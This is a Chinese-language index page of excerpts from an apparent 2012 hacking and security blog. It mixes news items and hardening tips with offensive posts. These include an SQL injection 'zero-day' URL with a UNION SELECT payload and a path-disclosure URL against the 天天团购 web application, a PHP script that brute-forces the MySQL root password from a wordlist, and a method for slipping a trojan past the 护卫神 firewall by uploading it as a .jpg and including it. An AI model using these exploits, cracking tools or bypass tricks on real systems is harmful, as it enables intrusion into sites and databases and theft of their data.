关于Session Fixation

分类:安全 | 2012-01-31 | 撸过 443 次
0人扯谈

前两天我转了篇文章到pst的邮件列表,是关于在struts 2框架下重新生成session的,引起了一些讨论,我觉得有必要在这里提醒下程序员们,可能他们早就遗忘了这种威胁了。

JSESSIONID Regeneration in Struts 2

实际上这就是一种针对Session Fixation 的防范。

Session Fixation 翻译过来就是 “Session 完成攻击”,以前的老的应用里可能比较常见这种问题,但是随着现在web应用越来越复杂,这种问题已经很少了。

先理解这个攻击,打个比方:

1. 你花钱买了一辆车
2. 你把车钥匙复制了一把
3. 你把这辆车卖给了一个[......]

继续阅读

mssql 清除木马

分类:技术 | 2012-01-31 | 撸过 332 次
0人扯谈

代码如下:

drop table te

drop function dbo.mdSQL

select a.name as Cname,b.name as tbname into te from syscolumns a,sysobjects b,systypes c
where b.xtype='U' and a.id=b.id and a.xtype=c.xtype
and c.name in ('text','ntext','varchar','nvarchar','char','nchar')

go
create function mdSQL(@tbname varchar(10[......]

继续阅读

DEDECMS安全设置指南

分类:技术 | 2012-01-30 | 撸过 389 次
0人扯谈

   DEDECMS 这名词细想起来,我还是有一份特殊的感情的,当初做网站的时候,最早用的动易CMS2006,后来转PHP后,一直用的DEDECMS,只是现今不在用了而已,可以说,它造就了很多中小站长,是中小站长的福音。

下面就DEDECMS的安全设置,简单记录下。
1、尽量使用纯PHP的主机空间,如果非要使用WINDOWS,最好关闭非所有PHP支持;
2、更改默认的 www.webshell.cc/dede/类管理地址;
3、给默认的admin管理帐号分配没有权限的用户组;
4、data/common.inc.php文件属性(Linux/Unix)设置为644或(Windows NT)设置[......]

继续阅读

天天团购最新0DAY及爆路径利用

分类:安全 | 2012-01-28 | 撸过 415 次
0人扯谈

暴路径:

https://www.webshell.cc/modules/admin/tttuangou.mod.php

利用:

https://www.webshell.cc/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,[......]

继续阅读

世界最早的计算机密码和黑客

分类:安全 | 2012-01-28 | 撸过 420 次
1人扯谈

    大多数人都对记忆密码深痛恶绝,但谁是发明计算机密码的“祸首”?《连线》联系了多位计算机历史学家,他们都一致认为1960年代MIT建造的大型分时计算机CTSS最早采用了密码。CTSS代表Compatible Time-Sharing System,和今天一样,密码并没起到保护作用,MIT博士生Allan Scherr是最早的密码破解黑客

   CTSS是最早的分时操作系统之一,它在许多方面可谓独领鳌头,如电子邮件、虚拟机、即时通讯和文件共享。MIT为计算机配置了多个终端,供不同用户使用,每个用户都有私人的文件夹,为不同用户分配密码显然是一个直截了当的解决方法。但在计算机时代早期,研究[......]

继续阅读

PHP Mysql 密码暴力破解,root密码破解 源码

分类:工具 | 2012-01-25 | 撸过 885 次
5人扯谈
<?
set_time_limit(0);                                   //脚本不超时

$ip = "localhost";                                   //IP
$user = "root";                                      //用户名
$passwd = file("password.txt");                      //密码字典

for($i=0; $i<count($passwd); $i++){
    $pass = Str[......]

继续阅读

黑客入侵美国政府安全网站反对SOPA法案

分类:新闻 | 2012-01-25 | 撸过 315 次
0人扯谈

知名黑客集团Anonymous附属的一个黑客组织AntiSec周一入侵了美国联邦政府的在线安全网站OnGuardOnline.gov。AntiSec在网站上威胁道,如果美国参、众两院正在审议的《禁止网络盗版法案》(以下简称“SOPA”)法案、《保护知识产权法》(以下简称“PIPA”)和《反假冒贸易协定》(ACTA)最终被通过,则将对企业互联网发起无情的攻击,毁掉大量的政府和公司网站。

AntiSec还称,还将公开此前所获得的大量的电子邮件、密码、银行账户和其他信息。AntiSec说:“我们控制了大量的根服务器,准备公布大量的信息。”

  OnGuardOnline.gov是美国14家联邦机[......]

继续阅读

Google再次成为Pwn2Own黑客大赛顶级赞助商 鼓励黑客入侵 Chrome

分类:新闻 | 2012-01-25 | 撸过 282 次
0人扯谈

一年一度的Pwn2Own黑客大赛即将在3月初于渥太华召开,目标是叫黑客攻破最新版本的Chrome、Safari、IE和Firefox浏览器。而Google再次作为顶级赞助商进行支持,提供6万美元作为最终大奖,二等奖和三等奖分别是3万和1.5万美元。

另外Google还提供2万美元奖励可以成功黑掉Chrome浏览器的黑客,如果你找到了一个非Chrome的bug但可以攻破浏览器的沙盒保护,也可以获得一万美元。

微软、Mozilla和Apple从未对这件事表现出任何兴趣,只有Google显得很积极,因为他们对安全问题看得很重。

黑客组织Anonymous拟1月28日攻击Facebook

分类:新闻 | 2012-01-24 | 撸过 345 次
0人扯谈

  据国外媒体报道,黑客组织Anonymous正在计划对Facebook发动新一轮攻击。据称,该组织已经宣布,将在1月28日将Facebook完全关闭,Anonymous的一名成员周一通过YouTube视频称:“尽管美国国会可能会推迟《禁止网络盗版法案(SOPA)》和《保护知识产权法案(PIPA)》,但是,这并不能够确保我们的互联网权利就提到充分的拥护和提倡。”

上周,一些网站相继关闭,以此抗议《禁止网络盗版法案》和《保护知识产权法案》,这两部法案旨在减少侵犯版权的行为,但在一些人士看来,这些法案可能会导致严格的审查和专制式的管制。美国政府在以侵犯版权为由查封文件共享网站Megaupload[......]

继续阅读

突破护卫神防火墙拦截传马

分类:安全 | 2012-01-23 | 撸过 439 次
0人扯谈

护卫神软件拦截传马是拦截你文件后缀名,但是不过滤jpg等一些常用文件的后缀!

所以可以用包含的方式

asp

<!--#include file="../UpLoadFile/2011091711453973499.jpg" -->

php

<?php

include "2.htm";

?>

用这种方式的话!就不会被杀掉了!

细心就能发现原来如此!

现在在想法子突破不能添加到组的问题!如果有兴趣的可以一起研究下

第 1 页,共 4 页1234